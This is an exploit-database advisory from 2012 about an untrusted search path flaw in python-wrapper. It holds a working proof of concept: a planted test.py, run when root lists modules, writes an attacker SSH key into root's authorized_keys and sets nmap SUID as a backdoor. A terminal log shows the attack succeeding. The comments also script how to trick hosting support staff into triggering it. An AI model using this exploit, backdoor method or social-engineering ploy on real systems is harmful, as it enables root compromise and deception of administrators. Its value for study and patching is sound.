[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : python-wrapper Untrusted Search Path/Code Execution Vulnerability
# Published : 2012-07-02
# Author :
# Previous Title : CoolPlayer Portable 2.19.2 Buffer Overflow ASLR bypass
# Next Title : Nvidia Linux Driver Privilege Escalation

# python-wrapper untrusted search path/code execution vulnerability
# Python-wrapper executes any test.py script within the current working directory, when supplied with help('modules').
# A non-priviledged user may gain code execution by tricking root to help('modules') or help() and then modules from within python-wrapper 
# while within a non-priviledged user's work directory. 
# The evil file MUST be titled test.py! os.system("evilcommand") will result in python-wrapper executing said command, and then continuing normally
# with no signs of compromise if you redirect command output. os.system("/bin/echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys") does not 
# work, however os.system("/bin/echo $(echo ssh-rsa yourkey yourkeycomment >> /root/.ssh/authorized_keys)") does. 
# Additionally, nmap makes a great backdoor from a non-priviledged user account because it's something that looks like you might actually
# want SETUID under certain circumstances, but not really(and it will bitch if invoked). In nmap 5.31DC1 the most useful switch(--interactive) was removed
# which previously allowed you to bang out a shell(!/bin/csh, but not bash). Thank you David/Juan Carlos Castro for breaking one of my favorites.
# NOW however there is the nmap scripting engine to exploit. As usual, the input-output commands will behave like any exploitable SETUID program 
# with input-output commands.
# A practical example of how this vulnerability could be useful is if you wish to attack a shared webhosting enviornment.
# After convincing root(support) to cd in to your directory, perhaps by uploading a broken "distraction.py" and getting him to troubleshoot it,
# you could pose the question: "Hey, what python modules do you guys have installed?" "I'm not quite sure how to list that..."
# "You can list the modules installed by entering python-wrapper, and typing help('modules')" "Oh!" *silent test.py execution by root* 
# "There's a lot of them... would you like them as an email attachment?" "Yeah, thanks. I think I'll look at that and try troubleshooting this more myself".
# - ShadowHatesYou (Shadow@SquatThis.net)
# 6/30/12

root@tourian:/home/shadow/python# ls -hl test.py
-rw-r--r-- 1 shadow shadow 137 Jun 30 13:06 test.py
root@tourian:/home/shadow/python# cat test.py
import os
os.system('/bin/echo $(echo "ssh-rss pwned byshadow" >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap')

root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwxr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# ls -hl /root/.ssh/authorized_keys
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
root@tourian:/home/shadow/python# python-wrapper
Python 2.7.3 (default, May  4 2012, 00:13:26)
[GCC 4.6.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> help('modules')

Please wait a moment while I gather a list of all available modules...

ArgImagePlugin      _bisect             email               pprint
BaseHTTPServer      _codecs             encodings           pptransport
Bastion             _codecs_cn          errno               ppworker
BdfFontFile         _codecs_hk          exceptions          profile
BeautifulSoup       _codecs_iso2022     fcntl               pstats
BeautifulSoupTests  _codecs_jp          filecmp             pty
BitTornado          _codecs_kr          fileinput           pwd
BmpImagePlugin      _codecs_tw          fnmatch             py_compile
BufrStubImagePlugin _collections        formatter           pyclbr
CDROM               _cracklib           fpformat            pydoc
CGIHTTPServer       _csv                fractions           pydoc_data
ConfigParser        _ctypes             ftplib              pyexpat
ContainerIO         _ctypes_test        functools           pyrit_cli
Cookie              _curses             future_builtins     pyximport
Crypto              _curses_panel       gamin               quopri
CurImagePlugin      _elementtree        gc                  random
Cython              _emerge             gdbm                re
DLFCN               _functools          genericpath         readline
DcxImagePlugin      _gamin              gentoolkit          repoman
DocXMLRPCServer     _gv                 getopt              repr
EpsImagePlugin      _hashlib            getpass             resource
ExifTags            _heapq              gettext             rexec
FitsStubImagePlugin _hotshot            git_remote_helpers  rfc822
FliImagePlugin      _imaging            glob                rlcompleter
FontFile            _imagingft          grp                 robotparser
FpxImagePlugin      _imagingmath        gv                  rrdtool
GbrImagePlugin      _io                 gzip                runpy
GdImageFile         _json               hashlib             scapy
GifImagePlugin      _lcms               heapq               sched
GimpGradientFile    _ldns               hmac                scipy
GimpPaletteFile     _locale             hotshot             select
GribStubImagePlugin _lsprof             htmlentitydefs      sets
HTMLParser          _md5                htmllib             setuptools
Hdf5StubImagePlugin _multibytecodec     httplib             sgmllib
IN                  _multiprocessing    ihooks              sha
IcnsImagePlugin     _pyio               imaplib             shelve
IcoImagePlugin      _random             imghdr              shlex
ImImagePlugin       _sha                imp                 shutil
Image               _sha256             importlib           signal
ImageChops          _sha512             imputil             site
ImageCms            _socket             inspect             smtpd
ImageColor          _sre                io                  smtplib
ImageDraw           _ssl                itertools           sndhdr
ImageDraw2          _strptime           java_config_2       socket
ImageEnhance        _struct             javatoolkit         spwd
ImageFile           _symtable           json                sre
ImageFileIO         _testcapi           keyword             sre_compile
ImageFilter         _threading_local    lcms                sre_constants
ImageFont           _unbound            ldns                sre_parse
ImageGL             _warnings           ldnsx               ssl
ImageGrab           _weakref            lib2to3             stat
ImageMath           _weakrefset         libsvn              statvfs
ImageMode           _xmlplus            libxml2             string
ImageOps            abc                 libxml2mod          stringold
ImagePalette        aifc                libxslt             stringprep
ImagePath           antigravity         libxsltmod          strop
ImageQt             anydbm              linecache           struct
ImageSequence       argparse            linuxaudiodev       subprocess
ImageShow           array               locale              sunau
ImageStat           ast                 logging             sunaudio
ImageTk             asynchat            lxml                svn
ImageTransform      asyncore            macpath             symbol
ImageWin            atexit              macurl2path         symtable
ImtImagePlugin      audiodev            magic               sys
IptcImagePlugin     audioop             mailbox             sysconfig
JpegImagePlugin     base64              mailcap             syslog
McIdasImagePlugin   bdb                 markupbase          tabnanny
MicImagePlugin      binascii            marshal             tarfile
MimeWriter          binhex              math                telnetlib
MpegImagePlugin     bisect              md5                 tempfile
MspImagePlugin      bs4                 mhlib               termios
OleFileIO           bz2                 mimetools           test
OpenIPMI            cPickle             mimetypes           textwrap
PAM                 cProfile            mimify              this
PIL                 cStringIO           mirrorselect        thread
PSDraw              calendar            mmap                threading
PaletteFile         cgi                 modulefinder        time
PalmImagePlugin     cgitb               multifile           timeit
PcdImagePlugin      chunk               multiprocessing     toaiff
PcfFontFile         cmath               mutex               token
PcxImagePlugin      cmd                 netrc               tokenize
PdfImagePlugin      code                netsnmp             trace
PixarImagePlugin    codecs              new                 traceback
PngImagePlugin      codeop              nis                 tty
PpmImagePlugin      collections         nntplib             types
PsdImagePlugin      colorsys            ntpath              unbound
Queue               commands            nturl2path          unboundmodule
SgiImagePlugin      compileall          numbers             unicodedata
SimpleHTTPServer    compiler            numpy               unittest
SimpleXMLRPCServer  contextlib          opcode              urllib
SocketServer        cookielib           operator            urllib2
SpiderImagePlugin   copy                optparse            urlparse
StringIO            copy_reg            os                  user
SunImagePlugin      cpyrit              os2emxpath          uu
TYPES               cracklib            ossaudiodev         uuid
TarIO               crypt               paramiko            warnings
TiffImagePlugin     ctypes              pdb                 weakref
TiffTags            curses              pickle              webbrowser
UserDict            cython              pickletools         whichdb
UserList            datetime            pipes               wsgiref
UserString          dbm                 pkg_resources       xattr
WalImageFile        decimal             pkgutil             xcbgen
WmfImagePlugin      difflib             platform            xdelta3main
XVThumbImagePlugin  dircache            plistlib            xdrlib
XbmImagePlugin      dis                 popen2              xen
XpmImagePlugin      distutils           poplib              xml
_LWPCookieJar       dnet                portage             xmllib
_MozillaCookieJar   doctest             posix               xmlrpclib
_OpenIPMI           drv_libxml2         posixfile           xxsubtype
__builtin__         dumbdbm             posixpath           yasm
__future__          dummy_thread        pp                  zipfile
_abcoll             dummy_threading     ppauto              zipimport
_ast                easy_install        ppcommon            zlib

Enter any module name to get more help.  Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".

>>> quit()
root@tourian:/home/shadow/python# ls -hl /usr/bin/nmap
-rwsr-xr-x 1 root root 1.9M Jun 30 13:06 /usr/bin/nmap
root@tourian:/home/shadow/python# cat /root/.ssh/authorized_keys
ssh-rss pwned byshadow

# Wish I had DuoSecurity!
# See you at Defcon!